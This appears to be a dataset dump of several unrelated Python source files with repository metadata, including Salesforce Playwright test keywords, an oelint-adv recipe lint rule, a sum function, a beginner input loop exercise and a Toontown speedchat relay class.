        )
        size = size or default_size
        browser = self.builtin.get_variable_value("${BROWSER}", "chrome")
        headless = browser.startswith("headless")
        # Strip the "headless" prefix (8 chars) to get the browser name.
        browser_type = browser[8:] if headless else browser
        browser_type = "chromium" if browser_type == "chrome" else browser_type
        browser_enum = getattr(SupportedBrowsers, browser_type, None)

        # Note: we can't just pass alias=useralias in the case of useralias being None.
        # That value gets passed to a salesforce query which barfs if the value
        # is None.
        login_url = (
            self.cumulusci.login_url(alias=useralias)
            if useralias
            else self.cumulusci.login_url()
        )

        if record_video:
            # ugh. the "dir" value must be non-empty, and will be treated as
            # a folder name under the browser/video folder. using "../video"
            # seems to be the only way to get the videos to go directly in
            # the video folder. Also, using "." doesn't work :-/
            record_video = {"dir": "../video"}
        width, height = size.split("x", 1)

        browser_id = self.browser.new_browser(browser=browser_enum, headless=headless)
        context_id = self.browser.new_context(
            viewport={"width": width, "height": height}, recordVideo=record_video
        )
        self.browser.set_browser_timeout("15 seconds")
        page_details = self.browser.new_page(login_url)

        if wait:
            self.wait_until_salesforce_is_ready(login_url)
        return browser_id, context_id, page_details

    @capture_screenshot_on_error
    def wait_until_loading_is_complete(self, locator=None, timeout="15 seconds"):
        """Wait for a lightning page to load.

        By default this keyword will wait for any element with the
        class 'slds-template__container', but a different locator can
        be provided.

        In addition to waiting for the element, it will also wait for
        any pending aura events to finish.
        """
        # NOTE(review): the ``timeout`` parameter is currently unused here;
        # confirm whether it should be forwarded to the Browser keywords.
        locator = (
            "//div[contains(@class, 'slds-template__container')]/*"
            if locator is None
            else locator
        )
        self.browser.get_elements(locator)
        self.browser.evaluate_javascript(None, WAIT_FOR_AURA_SCRIPT)
        # An old knowledge article recommends waiting a second. I don't
        # like it, but it seems to help. We should do a wait instead,
        # but I can't figure out what to wait on.
        time.sleep(1)

    @capture_screenshot_on_error
    def wait_until_salesforce_is_ready(
        self, login_url, locator=None, timeout="30 seconds"
    ):
        """Attempt to wait until we land on a lightning page

        In addition to waiting for a lightning page, this keyword will
        also attempt to wait until there are no more pending ajax
        requests.

        The timeout parameter is taken as a rough guideline. This
        keyword will actually wait for half of the timeout before
        starting checks for edge cases.
        """
        timeout_seconds = timestr_to_secs(timeout)
        start_time = time.time()
        locator = locator or "div.slds-template__container"
        # Slash-delimited string: the Browser library treats /.../ as a
        # regular expression when matching URLs.
        expected_url = rf"/{self.cumulusci.org.lightning_base_url}\/lightning\/.*/"

        while True:
            try:
                # only wait for half of the timeout before doing some additional
                # checks. This seems to work better than one long timeout.
                self.browser.wait_for_navigation(
                    expected_url, timeout_seconds // 2, PageLoadStates.networkidle
                )
                self.wait_until_loading_is_complete(locator)
                # No errors? We're golden.
                break

            except Exception as exc:
                # dang. Maybe we landed somewhere unexpected?
                if self._check_for_classic():
                    continue

                if time.time() - start_time > timeout_seconds:
                    self.browser.take_screenshot()
                    raise Exception("Timed out waiting for a lightning page") from exc

            # If at first you don't succeed, ...
            self.browser.go_to(login_url)

    def _check_for_classic(self):
        """Switch to lightning if we land on a classic page

        This seems to happen randomly, causing tests to fail
        catastrophically. The idea is to detect such a case and
        auto-click the "switch to lightning" link
        """
        try:
            self.browser.get_element("a.switch-to-lightning")
            self.builtin.log(
                "It appears we are on a classic page; attempting to switch to lightning",
                "WARN",
            )
            # just in case there's a modal present we'll try simulating
            # the escape key. Then, click on the switch-to-lightning link
            self.browser.keyboard_key(KeyAction.press, "Escape")
            self.builtin.sleep("1 second")
            self.browser.click("a.switch-to-lightning")
            return True

        except (AssertionError):
            return False

    def breakpoint(self):
        """Serves as a breakpoint for the robot debugger

        Note: this keyword is a no-op unless the ``robot_debug`` option for
        the task has been set to ``true``. Unless the option has been
        set, this keyword will have no effect on a running test.
        """
        return None
| UTF-8 | Python | false | false | 8,596 | py | 715 | SalesforcePlaywright.py | 511 | 0.621219 | 0.61738 | 0 | 220 | 38.072727 | 90 |
renankemiya/exercicios | 6,640,019,441,822 | 4d5b79d7c7fc339f6caed8cacbac9a902fdacaa3 | cb5d1d9098f65c3ad0eaf966d297e8e9158bfb77 | /matematica/calculo/soma.py | 391e83a205ebeec025b9d43a55a936d3cbefcb56 | [
"MIT"
def soma(parcela, parcela_2):
    '''Return the sum of the two given addends.

    :param parcela: first addend
    :param parcela_2: second addend
    :return: the sum parcela + parcela_2
    '''
    return parcela + parcela_2


if __name__ == '__main__':
    # Quick demo: prints 3.
    print(soma(1, 2))
priv-kweihmann/oelint-adv | 19,507,741,482,771 | a28e0668249758c66f445b5b84489e91181481d7 | 708ac9f1e466258b71c057cf64a4f5580467d2d4 | /oelint_adv/rule_base/rule_var_src_uri_srcrevtag.py | 0af862f898ac7c1936b9107a1f7e2356a3e919e5 | [
"BSD-2-Clause"
] | permissive | https://github.com/priv-kweihmann/oelint-adv | 93237344ed7c54030a95214b18180b703008ba2d | 6aab44abbe689fde96b32112f41a176a7959606d | refs/heads/master | 2023-08-24T19:51:35.550808 | 2023-08-23T15:31:56 | 2023-08-23T15:31:56 | 173,965,564 | 39 | 24 | BSD-2-Clause | false | 2023-09-11T14:04:29 | 2019-03-05T14:50:13 | 2023-08-26T17:11:59 | 2023-09-11T14:04:28 | 752 | 43 | 19 | 10 | Python | false | false | from oelint_adv.cls_rule import Rule
from oelint_parser.cls_item import Variable
from oelint_parser.helper_files import get_scr_components
from oelint_parser.parser import INLINE_BLOCK
class VarSRCUriSRCREVTag(Rule):
    """Oelint rule: flag recipes that pin a git SRC_URI entry with a
    ``tag=`` option while also setting a SRCREV for the same component —
    the two pinning mechanisms contradict each other."""

    def __init__(self):
        super().__init__(id='oelint.vars.srcurisrcrevtag',
                         severity='error',
                         message='\'tag\' in SRC_URI and a SRCREV for the same component doesn\'t compute')

    def check(self, _file, stash):
        # Collect findings for every SRC_URI git entry with a 'tag' option
        # that also has a matching SRCREV assignment.
        res = []
        items = stash.GetItemsFor(filename=_file, classifier=Variable.CLASSIFIER,
                                  attribute=Variable.ATTR_VAR, attributeValue='SRC_URI')
        for item in items:
            if any(item.Flag.endswith(x) for x in ['md5sum', 'sha256sum']):
                # These are just the hashes
                continue
            lines = [y.strip('"') for y in item.get_items() if y]
            for x in lines:
                if x == INLINE_BLOCK:
                    # Skip inline-python placeholders from the parser.
                    continue
                _url = get_scr_components(x)
                if _url['scheme'] in ['git'] and 'tag' in _url['options']:
                    _srcrevs = stash.GetItemsFor(filename=_file, classifier=Variable.CLASSIFIER,
                                                 attribute=Variable.ATTR_VAR, attributeValue='SRCREV')
                    if 'name' in _url['options']:
                        # Named entry: only SRCREV_<name> overrides apply.
                        _srcrevs = [
                            x for x in _srcrevs if _url['options']['name'] in x.SubItems]
                    else:
                        # Unnamed entry: only the plain SRCREV applies.
                        _srcrevs = [x for x in _srcrevs if not x.SubItems]
                    if any(_srcrevs):
                        res += self.finding(item.Origin, item.InFileLine)
        return res
| UTF-8 | Python | false | false | 1,739 | py | 184 | rule_var_src_uri_srcrevtag.py | 171 | 0.521564 | 0.519264 | 0 | 36 | 47.305556 | 107 |
Vincent105/python | 19,043,885,006,010 | b5f11ac38ecac4ebbbcef346e3bc882d8bf42447 | a974de6285db76b669937e9619a805c226bb11a6 | /01_Python_Crash_Course/0701_input_while/07T403_while_fill_dictionary.py | 6927fc7b867688c08ed976922bcb01a2827bfed0 | [] | no_license | https://github.com/Vincent105/python | 1b3f753e6b9db711e320b53c3e0a04c9fc818c37 | 65351234310a81a85331b0f11aef42507868774d | refs/heads/master | 2021-08-03T21:06:57.977065 | 2021-07-30T09:02:56 | 2021-07-30T09:02:56 | 185,359,652 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | responses = {}
active = True
while active:
name = input("What's your name?")
place = input("If you could visit one place in the world, where would you go?")
responses[name] = place
repeat = input("Would you like to keyin another respond? (yes/ no)")
if repeat == 'no':
active = False
print("\n--- Results ---")
for name, plcae in responses.items():
print(name.title() + " would like to go to " + place + ".") | UTF-8 | Python | false | false | 425 | py | 542 | 07T403_while_fill_dictionary.py | 471 | 0.642353 | 0.642353 | 0 | 17 | 24.058824 | 80 |
open-toontown/open-toontown | 14,980,845,944,249 | 73969146fe54bf9c64ffe6550cdff185f22e1b21 | da1721d2783ea4d67ff4e73cee6eee71292f2ef7 | /toontown/uberdog/TTSpeedchatRelay.py | 1bb965c253ded0f449d25f0e29e6489e29e900e0 | [
"BSD-3-Clause"
] | permissive | https://github.com/open-toontown/open-toontown | bbdeb1b7bf0fb2861eba2df5483738c0112090ca | 464c2d45f60551c31397bd03561582804e760b4a | refs/heads/develop | 2023-07-07T01:34:31.959657 | 2023-05-30T23:49:10 | 2023-05-30T23:49:10 | 219,221,570 | 143 | 104 | BSD-3-Clause | false | 2023-09-11T09:52:34 | 2019-11-02T22:24:38 | 2023-09-04T15:56:21 | 2023-09-11T09:52:34 | 7,389 | 123 | 63 | 34 | Python | false | false | from direct.distributed.DistributedObjectGlobal import DistributedObjectGlobal
from direct.directnotify.DirectNotifyGlobal import directNotify
from otp.otpbase import OTPGlobals
from otp.uberdog.SpeedchatRelay import SpeedchatRelay
from otp.uberdog import SpeedchatRelayGlobals
class TTSpeedchatRelay(SpeedchatRelay):
def __init__(self, cr):
SpeedchatRelay.__init__(self, cr)
def sendSpeedchatToonTask(self, receiverId, taskId, toNpcId, toonProgress, msgIndex):
self.sendSpeedchatToRelay(receiverId, SpeedchatRelayGlobals.TOONTOWN_QUEST, [taskId,
toNpcId,
toonProgress,
msgIndex])
| UTF-8 | Python | false | false | 635 | py | 1,547 | TTSpeedchatRelay.py | 1,538 | 0.777953 | 0.777953 | 0 | 16 | 38.6875 | 92 |
Subsets and Splits